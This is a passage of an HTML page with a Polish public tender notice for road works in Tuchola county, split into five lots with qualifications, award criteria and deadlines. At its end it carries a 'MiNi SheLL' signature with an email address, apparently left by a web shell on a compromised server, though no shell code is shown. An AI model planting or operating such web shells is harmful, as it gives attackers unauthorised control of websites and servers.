niniejszym ogłoszeniem zostaną wykonane w oparciu o zgłoszenie robót do organu administracji publicznej, a mianowicie: Modernizacja drogi powiatowej nr 1016C relacji Okoniny Nadjeziorne – Lińsk z wyłączeniem odcinka kolejowego nr BD.6743.5.5.2024.Ecz z dnia 17 stycznia 2024 r.<br/>Wykonawca dostarczy:<br/>- deklaracja (oświadczenie) o właściwym zagospodarowaniu odpadów (jeśli wymagane) <br/><br/>II. Przedmiotem zamówienia jest modernizacja drogi powiatowej nr 1007C relacji Byłyczek -Śliwic w zakresie: Modernizacja drogi powiatowej nr 1007C na odcinku od km 1+500 do km 2+019,4 długości 519,4 m <br/>1. Zakres robót obejmuje w szczególności:<br/>- Odtworzenie trasy drogi,<br/>- Wykonanie wzmocnienia nawierzchni jezdni z mieszanki mineralno asfaltowej, <br/>- Wykonanie poboczy z kruszyw łamanego<br/>- Likwidacja przełomów , <br/>- Wymiana uszkodzonych elementów przepustów, <br/>- Budowa zjazdów istniejących <br/>- Ustawienie ścieków z elementów betonowych, <br/>- Wykonanie elementów BRD.<br/><br/>3. Wszystkie roboty budowlane objęte niniejszym ogłoszeniem zostaną wykonane w oparciu o zgłoszenie robót do organu administracji publicznej, a mianowicie: Modernizacja drogi powiatowej nr 1007C relacji Byłyczek -Śliwice nr BD.6743.5.7.2024.Ecz z dnia 17 stycznia 2024 r.<br/>Wykonawca dostarczy:<br/>- deklaracja (oświadczenie) o właściwym zagospodarowaniu odpadów (jeśli wymagane) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111230-9 - Roboty w zakresie stabilizacji gruntu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Część 5. Przebudowa drogi gminnej w Gostycynie, realizatorem zadania jest Gmina Gostycyn.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> - Część 1. Budowa drogi wewnętrznej ul. Kasztanowej w Tucholi, realizatorem zadania jest Gmina Tuchola.<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie przynajmniej dwie roboty polegające na budowie / przebudowie / drogi o dł. min. 150 mb w technologii betonowej kostki brukowej oraz przebudowę / budowę sieci elektroenergetycznej o nap. 0,4 kV i 15 kV oraz aby dołączył do ww. wykazu min. 2 szt. referencji na wykonane roboty<br/>b) dysponuje lub będzie dysponował podczas realizacji zamówienia osobą:<br/>- kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/>- kierownika robót br. elektrycznej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/><br/>- Część 2. Budowa drogi gminnej nr 010778C ul. Obrońców Polskości wraz z kanalizacją deszczową, realizatorem zadania jest Gmina Tuchola.<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie przynajmniej dwie roboty polegające na budowie / przebudowie / drogi o dł. min. 150 mb wraz z budową sieci kanalizacji deszczowej bądź sanitarnej o dł. 150 m, oraz aby dołączył do ww. wykazu min. 2 szt. referencji na wykonane roboty<br/>b) dysponuje lub będzie dysponował podczas realizacji zamówienia co najmniej:<br/>- kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/>- kierownika robót br. sanitarnej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/><br/>- Część 3. Rozbudowa drogi nr 1030C na terenie gminy Lubiewo, realizatorem zadania jest Powiat Tucholski.<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie przynajmniej dwie roboty polegające na budowie / przebudowie / drogi o dł. min. 1000 mb wraz z budową sieci kanalizacji deszczowej bądź sanitarnej długości min 500 m , budowy oświetlenia drogowego o długości minimum 500m oraz aby dołączył do ww. wykazu min. 2 szt. referencji na wykonane roboty<br/>b) dysponuje lub będzie dysponował podczas realizacji zamówienia co najmniej:<br/>- kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej, oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/>- kierownika robót br. sanitarnej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz będącą członkiem właściwej Izby Inżynierów Budownictwa, kierownika robót elektycznych oraz teletechnicznych <br/><br/>- Część 4. Przebudowa dróg powiatowych nr 1007C (ok 750 mb) i 1016C (ok 750 mb) na terenie gminy Śliwice, realizatorem zadania jest Powiat Tucholski.<br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie przynajmniej dwie roboty polegające na remoncie drogi o dł. min. 500 mb oraz aby dołączył do ww. wykazu min. 2 szt. referencji na wykonane roboty<br/>b) dysponuje lub będzie dysponował podczas realizacji zamówienia co najmniej:<br/>- kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz będącą członkiem właściwej Izby Inżynierów Budownictwa.<br/><br/>- Część 5. Przebudowa drogi gminnej w Gostycynie, realizatorem zadania jest Gmina Gostycyn.<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie drogi o wartości brutto minimum 500 000,00 zł brutto w jednym zadaniu.<br/>b) dysponuje lub będzie dysponował podczas realizacji zamówienia co najmniej 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami bez ograniczeń w specjalności drogowej (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi, wykonają poszczególni wykonawcy (jeżeli dotyczy)<br/>Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający,<br/>że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów<br/>Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy)<br/>Pełnomocnictwo (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający udziela zaliczki, która zostanie wypłacona zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych „Ósmej Edycji Naboru Wniosków” tj. Wykonawcy zostanie udzielona zaliczka w wysokości min. 2% wynagrodzenia należnego Wykonawcy, w terminie do 7 dni od dnia podpisania umowy na podstawie faktury zaliczkowej wystawionej przez Wykonawcę. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 Pzp oraz wskazanym w Wzorze umowy, stanowiącym Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sidaspzp.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-14 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com